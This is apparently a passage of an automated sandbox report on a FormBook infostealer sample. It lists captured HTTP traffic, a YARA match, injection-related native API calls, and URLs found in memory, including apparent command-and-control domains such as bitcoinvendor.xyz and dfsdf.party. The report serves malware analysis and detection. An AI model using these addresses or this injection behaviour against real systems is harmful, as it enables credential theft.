20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:14:40 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: x6fGRpae78G.exe, 00000006.00000002.4498458965.00000000058EB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitcoinvendor.xyz
              Source: x6fGRpae78G.exe, 00000006.00000002.4498458965.00000000058EB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitcoinvendor.xyz/1lt7/
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: systray.exe, 00000004.00000002.4499033566.0000000007F90000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496704493.000000000621C000.00000004.10000000.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496334125.0000000003E6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: systray.exe, 00000004.00000002.4495421876.00000000034C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: systray.exe, 00000004.00000002.4495421876.00000000034C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: systray.exe, 00000004.00000003.2649216268.000000000821C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: systray.exe, 00000004.00000002.4496704493.0000000006B88000.00000004.10000000.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496334125.00000000047D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.dfsdf.party/a8it/?mdTH1=bxE0iX4XoFeHD&qv=SPUUvQKZflCEt7RI8wzTHcF8SQi3M6mUZJPT09uToqfxraP
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: systray.exe, 00000004.00000002.4496704493.000000000608A000.00000004.10000000.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496334125.0000000003CDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CFCAA3 NtClose,0_2_00CFCAA3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CDAAA1 NtDelayExecution,0_2_00CDAAA1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD1768 NtProtectVirtualMemory,0_2_00CD1768
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102B60 NtClose,LdrInitializeThunk,0_2_01102B60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01102DF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01102C70
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011035C0 NtCreateMutant,LdrInitializeThunk,0_2_011035C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01104340 NtSetContextThread,0_2_01104340
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01104650 NtSuspendThread,0_2_01104650
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102B80 NtQueryInformationFile,0_2_01102B80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102BA0 NtEnumerateValueKey,0_2_01102BA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102BF0 NtAllocateVirtualMemory,0_2_01102BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102BE0 NtQueryValueKey,0_2_01102BE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102AB0 NtWaitForSingleObject,0_2_01102AB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102AD0 NtReadFile,0_2_01102AD0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102AF0 NtWriteFile,0_2_01102AF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102D10 NtMapViewOfSection,0_2_01102D10
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102D00 NtSetInformationFile,0_2_01102D00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102D30 NtUnmapViewOfSection,0_2_01102D30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102DB0 NtEnumerateKey,0_2_01102DB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102DD0 NtDelayExecution,0_2_01102DD0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102C00 NtQueryInformationProcess,0_2_01102C00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102C60 NtCreateKey,0_2_01102C60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102CA0 NtQueryInformationToken,0_2_01102CA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102CC0 NtQueryVirtualMemory,0_2_01102CC0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102CF0 NtOpenProcess,0_2_01102CF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102F30 NtCreateSection,0_2_01102F30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102F60 NtCreateProcessEx,0_2_01102F60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102F90 NtProtectVirtualMemory,0_2_01102F90
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102FB0 NtResumeThread,0_2_01102FB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102FA0 NtQuerySection,0_2_01102FA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102FE0 NtCreateFile,0_2_01102FE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102E30 NtWriteVirtualMemory,0_2_01102E30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102E80 NtReadVirtualMemory,0_2_01102E80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102EA0 NtAdjustPrivilegesToken,0_2_01102EA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102EE0 NtQueueApcThread,0_2_01102EE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01103010 NtOpenDirectoryObject,0_2_01103010
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01103090 NtSetValueKey,0_2_01103090
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011039B0 NtGetContextThread,0_2_011039B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01103D10 NtOpenProcessToken,0_2_01103D10
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01103D70 NtOpenThread,0_2_01103D70
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05234650 NtSuspendThread,LdrInitializeThunk,4_2_05234650
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05234340 NtSetContextThread,LdrInitializeThunk,4_2_05234340
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_05232D30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232D10 NtMapViewOfSection,LdrInitializeThunk,4_2_05232D10
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05232DF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232DD0 NtDelayExecution,LdrInitializeThunk,4_2_05232DD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232C60 NtCreateKey,LdrInitializeThunk,4_2_05232C60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05232C70
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_05232CA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232F30 NtCreateSection,LdrInitializeThunk,4_2_05232F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232FB0 NtResumeThread,LdrInitializeThunk,4_2_05232FB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232FE0 NtCreateFile,LdrInitializeThunk,4_2_05232FE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_05232E80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232EE0 NtQueueApcThread,LdrInitializeThunk,4_2_05232EE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232B60 NtClose,LdrInitializeThunk,4_2_05232B60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_05232BA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232BE0 NtQueryValueKey,LdrInitializeThunk,4_2_05232BE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_05232BF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232AF0 NtWriteFile,LdrInitializeThunk,4_2_05232AF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232AD0 NtReadFile,LdrInitializeThunk,4_2_05232AD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052335C0 NtCreateMutant,LdrInitializeThunk,4_2_052335C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052339B0 NtGetContextThread,LdrInitializeThunk,4_2_052339B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232D00 NtSetInformationFile,4_2_05232D00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232DB0 NtEnumerateKey,4_2_05232DB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232C00 NtQueryInformationProcess,4_2_05232C00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232CF0 NtOpenProcess,4_2_05232CF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232CC0 NtQueryVirtualMemory,4_2_05232CC0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232F60 NtCreateProcessEx,4_2_05232F60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232FA0 NtQuerySection,4_2_05232FA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232F90 NtProtectVirtualMemory,4_2_05232F90
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232E30 NtWriteVirtualMemory,4_2_05232E30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232EA0 NtAdjustPrivilegesToken,4_2_05232EA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232B80 NtQueryInformationFile,4_2_05232B80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05232AB0 NtWaitForSingleObject,4_2_05232AB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05233010 NtOpenDirectoryObject,4_2_05233010
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05233090 NtSetValueKey,4_2_05233090
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05233D10 NtOpenProcessToken,4_2_05233D10
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05233D70 NtOpenThread,4_2_05233D70
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03229740 NtReadFile,4_2_03229740
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032295D0 NtCreateFile,4_2_032295D0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03229A40 NtAllocateVirtualMemory,4_2_03229A40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03229830 NtDeleteFile,4_2_03229830
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032298D0 NtClose,4_2_032298D0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAF1C6 NtQueryInformationProcess,4_2_04FAF1C6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE89D30_2_00CE89D3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CFF0B30_2_00CFF0B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE01A20_2_00CE01A2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE01A30_2_00CE01A3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD22DC0_2_00CD22DC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD22E00_2_00CD22E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD2A800_2_00CD2A80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE6BCE0_2_00CE6BCE
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE03C30_2_00CE03C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE6BD30_2_00CE6BD3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CDE3B30_2_00CDE3B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CDE3B20_2_00CDE3B2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CDE4FD0_2_00CDE4FD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CDE5030_2_00CDE503
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD2F470_2_00CD2F47
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CD2F500_2_00CD2F50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C01000_2_010C0100
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116A1180_2_0116A118
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011581580_2_01158158
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011901AA0_2_011901AA
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011841A20_2_011841A2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011881CC0_2_011881CC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011620000_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118A3520_2_0118A352
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE3F00_2_010DE3F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011903E60_2_011903E6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011702740_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011502C00_2_011502C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D05350_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011905910_2_01190591
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011744200_2_01174420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011824460_2_01182446
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117E4F60_2_0117E4F6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F47500_2_010F4750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D07700_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CC7C00_2_010CC7C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EC6E00_2_010EC6E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E69620_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A00_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0119A9A60_2_0119A9A6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D28400_2_010D2840
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DA8400_2_010DA840
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B68B80_2_010B68B8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE8F00_2_010FE8F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118AB400_2_0118AB40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01186BD70_2_01186BD7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA800_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116CD1F0_2_0116CD1F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DAD000_2_010DAD00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E8DBF0_2_010E8DBF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CADE00_2_010CADE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0C000_2_010D0C00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170CB50_2_01170CB5
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0CF20_2_010C0CF2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01172F300_2_01172F30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01112F280_2_01112F28
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F0F300_2_010F0F30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01144F400_2_01144F40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114EFA00_2_0114EFA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2FC80_2_010C2FC8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DCFE00_2_010DCFE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118EE260_2_0118EE26
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0E590_2_010D0E59
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118CE930_2_0118CE93
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2E900_2_010E2E90
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118EEDB0_2_0118EEDB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0119B16B0_2_0119B16B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BF1720_2_010BF172
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110516C0_2_0110516C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DB1B00_2_010DB1B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D70C00_2_010D70C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117F0CC0_2_0117F0CC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011870E90_2_011870E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118F0E00_2_0118F0E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118132D0_2_0118132D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BD34C0_2_010BD34C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0111739A0_2_0111739A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D52A00_2_010D52A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EB2C00_2_010EB2C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011712ED0_2_011712ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011875710_2_01187571
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116D5B00_2_0116D5B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011995C30_2_011995C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118F43F0_2_0118F43F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C14600_2_010C1460
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118F7B00_2_0118F7B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011156300_2_01115630
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011816CC0_2_011816CC
